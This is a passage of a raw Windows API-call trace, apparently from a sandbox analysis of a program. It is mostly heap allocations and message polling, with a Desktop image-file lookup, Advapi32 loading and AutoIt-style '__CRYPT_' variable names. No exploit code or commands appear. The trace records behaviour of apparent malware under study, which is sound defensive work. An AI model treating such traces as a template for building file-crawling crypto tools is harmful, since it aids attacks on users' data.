Flags=0x0, Size=0x10) returned 0x2e504b8 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0140.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0140.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0140.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0140.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0140.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0140.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0140.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0140.653] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0140.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0140.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0140.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0140.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0140.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0140.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0140.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0140.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0140.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0140.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0140.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0140.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0140.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0140.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0140.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0140.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0140.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0140.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0140.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0140.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0140.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0140.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0140.655] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/CSIs1Qt1V9g.jpg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b04720, ftCreationTime.dwHighDateTime=0x1d5e1d0, ftLastAccessTime.dwLowDateTime=0x3666e8e0, ftLastAccessTime.dwHighDateTime=0x1d5ed9d, ftLastWriteTime.dwLowDateTime=0x3666e8e0, ftLastWriteTime.dwHighDateTime=0x1d5ed9d, nFileSizeHigh=0x0, nFileSizeLow=0x185aa, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="CSIs1Qt1V9g.jpg", cAlternateFileName="CSIS1Q~1.JPG")) returned 0xa87250 [0140.655] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0140.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0140.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0140.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0140.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0140.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0140.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0140.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0140.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0140.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0140.656] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0140.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0140.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0140.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0140.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0140.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0140.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0140.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0140.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0140.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0140.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0140.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0140.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0140.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0140.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0140.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0140.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0140.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0140.657] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0140.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0140.657] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0140.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0140.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0140.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0140.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0140.658] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0140.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0140.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0140.658] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0140.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0140.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0140.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0140.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0140.658] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0140.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0140.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0140.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0140.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0140.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0140.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0140.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0140.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0140.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0140.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0140.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0140.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0140.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0140.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0140.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0140.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0140.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0140.660] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0140.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0140.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0140.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0140.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0140.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0140.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0140.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0140.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0140.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0140.661] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0140.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0140.661] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0140.661] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0140.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0140.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0140.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0140.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0140.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0140.662] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0140.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0140.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0140.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0140.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0140.662] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0140.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0140.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0140.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0140.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0140.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0140.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0140.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0140.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0140.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0140.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0140.662] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0140.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0140.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0140.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0140.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0140.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0140.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0140.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0140.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0140.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0140.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0140.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0140.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0140.663] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0140.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0140.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0140.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0140.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0140.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0140.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0140.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0140.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0140.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0140.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0140.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0140.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0140.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0140.664] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.664] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.664] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0140.664] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: 